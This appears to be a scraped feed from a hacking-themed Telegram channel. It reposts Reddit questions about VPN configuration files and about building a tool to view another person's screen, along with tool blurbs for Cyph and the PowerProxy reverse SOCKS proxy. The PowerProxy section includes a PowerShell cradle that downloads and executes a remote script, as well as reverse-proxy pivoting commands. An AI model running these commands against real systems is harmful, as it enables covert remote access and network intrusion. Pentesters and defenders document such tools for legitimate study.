Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Zenmate openvpn configurations

Hi,

I'm using Zenmate for about a year now. It works for what I use but I do have some problems with it..

First of all as much as I can tell there are no way to download clients now. I cannot connect to account dashboard anymore ( It says internal server error every time I try ). That means I cannot download any client software or configuration. Not that there was any configuration file to start with. From the start I couldn't see any OpenVPN configuration anywhere, and a lot of FAQ was outdated or bogus to start with.

I can still connect via its' browser extension and a client for windows I downloaded when I registered to the service. As far as I understand the client installs a network driver and uses openvpn or ikev2 connection ( automatically selects or manually configured ) to CyberGhost's VPN servers. I found that CyberGhost and Zenmate belongs to the same company. There are a lot of references to CyberGhost in client's installation folder.

I found CA certificate in the client folder also. I tried to find crt/key files for my account by connecting to the service and checking folders. The weird thing is I reinstalled Windows a while back and kept a backup of old drive's contents and I found a .ccu/.crt/.key combination with a uid in the AppData/Local/Zenmate folder. So I think they belong to my account.

.ccu is a text file but it looks like it's encoded with base64 or something ( it ends with "==" ). Although decoding it didn't show a comrehensible information.

TL;DR: What I really want is install Zenmate on a router or a Linux environment and share the connection, although without access to OpenVPN configuration files ( for every country ) and crt/key or password it's impossible. They made this doubly impossible by removing access to their account dashboard page. They are actually pretty shady and they cannot give any support at all.

I want to try openvpn configurations from CyberGhost ( they'd probably work ) but I don't have access to CyberGhost and they share configuration files only to account owners AFAIK.

submitted by /u/Plato79x
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Tools

Hi im fairly new to this "hacker" stuff on kali and stuff. I tried out BeEF, Metasploit, and other thing that I forgot the name. I like the way how BeEF works and how it just lets you control the other person's computer. Metasploit is very hard in my opinion, I don't understand the basics like creating something or reverse shell-ing someone. I want to create my own tool. I know, it sounds dumb but its worth a shot right? Im trying to find people who know python and kali so you might help me. I want to make a tool that lets you actually see the other person's screen ie: desktop or the application he is running. I really like BeEF, but it is complicated and it has a bunch of exploits, social engineering thingy and more. Thanks for listening. I know this kinda violates a rule, but anyways

submitted by /u/Southern_Ad2408
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
we hacked an email address to secretly chat with someone

I've been using an email address for a few weeks to secretly chat with someone. However I decided to delete this Google account a two weeks ago but she received a stupid email from this address 3 days ago when it was supposed to be deleted He sent her an e-mail containing drafts that I had written for her. She now feels someone is spying on her... Have you ever seen a hacker do this kind of stupid thing on an empty email address?

submitted by /u/Eleynix
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Cyph : Cryptographically Secure Messaging And Social Networking Service

Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy combined with best-in-class ease of use.

Cyph’s patented technology — built by former SpaceX engineers, audited by Cure53, and the basis of research presentations at Black Hat and DEF CON — uniquely allows Cyph to solve the major security and usability limitations of conventional solutions.

Commands available to run locally (Node.js and Docker required):

* npm run serve: Serves a local instance at http://localhost:42002
* npm run verify: Verifies that the signed production build is reproducible against the local copy of the code

Running any of these commands for the first time will build the Docker image locally, which may take a while.

Cyph is run by founders Ryan Lester and Josh Boehm, former SpaceX engineers and best friends of over 20 years who had spent many all-nighters working closely together on various software projects. Cyph was initially started through the Mach37 Cyber Accelerator, and is currently backed by the Goel Fund and Center for Innovative Technology.

Cyph was a natural project for us to start together, as we’ve always shared an interest in cypherpunk efforts to enhance individual freedom and privacy.

We spent our teens getting into programming; tinkering with Tor, Linux, and OTR encryption; and mining Bitcoin before it was cool. As adults (who regularly handled ITAR-sensitive information at SpaceX), the difficulty of communicating privately online had become a palpable thorn in our side — existing solutions were cumbersome to use, missing basic features, and not really all that secure in practice. The revelations brought to light by Edward Snowden ultimately inspired us to take this upon ourselves.

We knew there could be a better way, so we created Cyph.
Download

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities

PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities.

PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.

Setup

Import the script:

iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”)
OR
Import-Module \192.168.0.22\Public\PowerProxy.ps1

reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the –no-encrypt option.

Usage

For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py –help

Run a reverse proxy

On local machine, start the handler:

Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080

In PowerShell:

Start-ReverseSocksProxy 172.1.1.20 -Port 8080

Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:

curl –socks4 127.0.0.1:1080 http://10.10.2.69/

Run a traditional SOCKS server

Start-SocksProxy 172.10.2.20 -Port 9050

Require authentication

Use PSCredential objects to require a username and password:

Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force “Passw0rd123”
$Cred = New-Object System.Management.Automation.PSCredential (“ProxyUser”, $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Download

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
It's a Race to Secure the Software Supply Chain — Have You Already Stumbled?

If you haven't properly addressed the issue, you're already behind. But even if you've had a false start, it's never too late to get back up.